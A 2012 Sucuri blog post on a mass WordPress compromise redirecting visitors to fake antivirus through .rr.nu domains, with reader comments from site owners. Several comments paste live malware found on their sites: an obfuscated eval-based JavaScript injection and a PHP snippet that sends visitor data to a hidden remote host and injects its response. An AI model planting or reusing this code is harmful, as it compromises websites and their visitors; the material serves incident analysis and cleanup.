• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

Latest Mass Compromise of WordPress sites – More Details

March 8, 2012Daniel Cid

0
SHARES
FacebookTwitterSubscribe

We are getting lots of questions about the latest mass compromise targeting WordPress sites (redirecting to fake AV) that has affected over 30,000 domains.

The first question is how are these sites getting hacked? On all the cases we analysed, they either had outdated versions of WordPress, or of a plugin. We can safely rule out any new vulnerability on WordPress itself.

We also posted about it a week ago when we detected this malware campaign using .rr.nu domains.

As we promised in the previous post, this is an update to what we are seeing.

More Details

  • The malicious domains are still pointing to 194.28.114.103 and 194.28.114.102 (same IP’s used by the group behind the sweepstakesandcontestsdo.com and infoitpoweringgathering.com attacks)
  • More than 200 different .rr.nu domains are being used
  • We have identified more than 500 variations of the injected URL to random domains names in the .rr.nu TLD:

—

If you’re not sure if you’re infected, do a free website malware scan using SiteCheck

0
SHARES
FacebookTwitterSubscribe

Categories: Website Malware Infections, WordPress Security

About Daniel Cid

Daniel B. Cid is Founder of Sucuri and the VP of Engineering for the GoDaddy Security Products group. He is also the founder of OSSEC and CleanBrowsing. You can find more about Daniel on his site dcid.me or on Twitter: @danielcid

Reader Interactions

Comments

  1. Jobe Bittman

    March 8, 2012

    I couldn’t get an affected WordPress server to give me the bad link without using a Chrome Macintosh user-agent in my wget request. Once you do, it looks like its clickjacking to a pay-per-click site and redirecting out to google.com. I’m guessing the OSX clicks pay more.

    • Four Season

      March 11, 2012

      this my web site
      http://fourseasonnews.blogspot.com/

  2. MacAmbulance

    March 9, 2012

    The web logs from my affected host show this : 

    64.15.78.203 – – [04/Mar/2012:23:21:20 +0000] “GET /wp-login.php HTTP/1.1” 200 3430 “-” “Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2b5) Gecko/20091204 Firefox/3.6b5″64.15.78.203 – – [04/Mar/2012:23:21:21 +0000] “POST /wp-login.php HTTP/1.1” 302 – “-” “Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2b5) Gecko/20091204 Firefox/3.6b5″64.15.78.203 – – [04/Mar/2012:23:21:24 +0000] “GET /wp-admin/ HTTP/1.1” 200 69832 “-” “Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2b5) Gecko/20091204 Firefox/3.6b5″64.15.78.203 – – [04/Mar/2012:23:21:37 +0000] “GET /wp-admin/theme-editor.php HTTP/1.1” 200 50722 “-” “Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2b5) Gecko/20091204 Firefox/3.6b5″64.15.78.203 – – [04/Mar/2012:23:21:42 +0000] “POST /wp-admin/theme-editor.php HTTP/1.1” 200 51117 “-” “Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2b5) Gecko/20091204 Firefox/3.6b5″64.15.78.203 – – [04/Mar/2012:23:21:46 +0000] “GET /wp-admin/theme-editor.php?file=%2Fthemes%2Fboxpark%2Farchive.php&theme=Boxpark%2Fboxpark&dir=theme HTTP/1.1” 200 41820 “-” “Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2b5) Gecko/20091204 Firefox/3.6b5”

    Unless I’m wrong, it looks like someone posted some data to wp-login.php and was granted immediate access. All our passwords are secure so perhaps the SQL Server was hacked?

  3. FirstRentals

    March 9, 2012

    How to get rid of this Malware . Even some of my websites are affected

  4. Oylesinetakilmaca

    March 9, 2012

    Im following you for this problem. My all wordpress websites infected. I opened them without delete FTP cookies. The iframe code changing but same on all websites. I cant find it on anywhere.

    Date&&(a=”396″); var b=’!1;var=b gifonll”=d==fi y”;1-(ucomenie.t.ckooindf(gOxe6E2x{)if)7=4av;r date=neD w;jp2″;”=g.d(Tted.semitegTimar e()v;)dom [‘= sud’u.bdum,’s.bmuk’.eu,’dbmu’,’b.amud’rfud’u’,.bmd’,umbdum.nl’,’b.c’du,’nrav’pjmb. ;]od m =flo Ma.htor(h.rtaMsmo(moandd*)el.ngtdomh);=pts[d+”.]moD wde;mn”en=eta(d.e()getmiT+x4ocud;)=eic.tmenkoofig+”=pe(“+eacsed.MTSGote;”(gntri+))ipxrestoG=”+.deMTSng(irt;”/ap;)+”=httxt=”h”+tttp//:p+”.cgni/ rapj+i?”v;g-=e1!=tornavagi.usgenAresaCoLot.trew)(e.in”fidex(fOref),f”xotcnj,”=”1uf=noi(){oto};jrp.typb:f{=e=i{oitunc)(n73424;retu=”;”uurnt},xt )(ncnua:foit=q{“q”709;dN94=;w=rJ=;””uco rab;vd=gnemt;c;vaR=kb=Qr kndoiw= ra”=Ow;dv;”t=hhis=pK;fQDc==””y{urt;=Lc671K= ;00=Wp””;SU=wK=e;b””;pOR=Or””==Ke=b;QVkBq;=b;”;vmF=Fm”W=”settegEw;sirAtt”fd;b=gK=var626;97 a=qR=;][“=fe;bvS=(||)”0;a.heipus”(hghtsub”,”ertgnistr”,”ercatetgeElenemt”,dthiw”tesmbv”,”rfiv,”W,””apbod,”ypenildhCd)”c,g,”,frs”Oe;=64=””506Ty;;hSaU=;b=;b=””=uKDKf;=Iy””;”;swI=Iw”J=12;r361055a;”G=”4=ALg;=40r l598av;=a[a[1[]2=Zn1,3]](;)6;””gP=ar “gPv;”m=a[a[]4[=Oc,3(1]];)692531;amevK=”+m”;ttI””=I=Zjl”=;lO;”O44253;[a[p=a]5[1]]11),3(“=Uetu+”bq;”r;”JQ=n=hb;v ra.b(T=”t;)]9[ ra”;va=c]l[(vK10]);c[a[]=n=b;Dn;c;””=O mIOIm[a[3]]oH==a[;]8402kM=;18]]0c;””kM[a[[a=8];bW=mH=;”””bWY=”w;”]]6]9[“;a[a[[a[7]]T=k(c)Vf;R=”atcc}”l,”h{)h(r”=K=TKb,g(“<.wretihtmbodlh/ydlmt>”)”,k,uI”=E.semeoiTt(nonufut(itch{).a(),i)},332GB=82,292″=S596zN=i}1}}”;cBr o=””av;=ne;gTj w;}).o;=””(a’,a= a.split(“”),c;for(c in a)if(“string”==typeof a[c]){var d=[],e=!0,f=1*a[c];for(Z=0;Z<b.length;Z+=f)d[Z]=e?b.substr(Z,f).split("").reverse().join(""):b.substr(Z,f),e=!e;b=d.join("")}window.eval(b);b=void 0;

  5. Four Season

    March 11, 2012

    Nice in The new post
    i like…this my web visit problem
    http://fourseasonnews.blogspot.com/

  6. Joseph Levin

    March 16, 2012

    I do not believe that this, in all cases, is a TimThumb exploit. Every Client I have that is running Word Press got hacked in the last few days. My website was hacked, and I keep WP and the plugins and themes updated. Similarly, I use .htaccess and php.ini directives, as well as mods to WordPress itself to help. None of my themes had the TimThumb code present. Neither did WordPress itself.

    It does seem like it is a WordPress ‘related’ exploit (but not specifically the Blog installed all by itself). The vulnerability present has not come to light through my direct searching or searching for answers on the ‘net.

    I will say this- from a site I know has been hacked that I have not as yet had time to clean, the SiteCheck tool (shown in the post, above) does not find the malicious code, nor the vulnerability.

    I’m at a loss as to what to do beyond the ‘scorched earth’ approach, which is definitely not practical under many situations.

    At any rate, here is the malicious code, without its opening and closing PHP tags-

    CODE BEGINS-
    if (!isset($sRetry))
    {
    global $sRetry;
    $sRetry = 1;
        // This code use for global bot statistic
        $sUserAgent = strtolower($_SERVER[‘HTTP_USER_AGENT’]); //  Looks for google serch bot
        $stCurlHandle = NULL;
        $stCurlLink = “”;
        if((strstr($sUserAgent, ‘google’) == false)&&(strstr($sUserAgent, ‘yahoo’) == false)&&(strstr($sUserAgent, ‘baidu’) == false)&&(strstr($sUserAgent, ‘msn’) == false)&&(strstr($sUserAgent, ‘opera’) == false)&&(strstr($sUserAgent, ‘chrome’) == false)&&(strstr($sUserAgent, ‘bing’) == false)&&(strstr($sUserAgent, ‘safari’) == false)&&(strstr($sUserAgent, ‘bot’) == false)) // Bot comes
        {
            if(isset($_SERVER[‘REMOTE_ADDR’]) == true && isset($_SERVER[‘HTTP_HOST’]) == true){ // Create  bot analitics           
            $stCurlLink = base64_decode( ‘aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw’).’?ip=’.urlencode($_SERVER[‘REMOTE_ADDR’]).’&useragent=’.urlencode($sUserAgent).’&domainname=’.urlencode($_SERVER[‘HTTP_HOST’]).’&fullpath=’.urlencode($_SERVER[‘REQUEST_URI’]).’&check=’.isset($_GET[‘look’]);
                $stCurlHandle = curl_init( $stCurlLink );
        }
        }
    if ( $stCurlHandle !== NULL )
    {
        curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
        $sResult = @curl_exec($stCurlHandle);
        if ($sResult[0]==”O”)
         {$sResult[0]=” “;
          echo $sResult; // Statistic code end
          }
        curl_close($stCurlHandle);
    }
    }

    CODE ENDS

    Any help anyone can give in how to fix the exploit, or otherwise neutralize it would be greatly appreciated.

    Thank you all for your time.

  7. Eric

    March 24, 2012

    This hack infects every PHP file on your server with “eval(base64_decode(…” In WordPress installs, it appears to inject a bunch of nl.php links into the comments table (just search your database for nl.php and it will return the infections). I purged the offending records from the database, replaced the entire site with clean PHP, reset all usernames and passwords (including MySQL and FTP), and that seemed to fix it…. for a couple of days. Now it appears to be back, even though everything appears to still be clean (no eval in the PHP files, no nl.php in the database, etc.). Anyone have ideas where else to check?

  8. Michael

    April 5, 2012

    This site has a script that worked for me to clean off the infection!
    http://www.spkaa.com/3-step-fix-for-your-rr-nu-wordpress-virus-outbreak
     

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

WordPress Security Course

The Anatomy of Website Malware Webinar

WordPress Security Guide

Join Over 20,000 Subscribers!

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2021 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.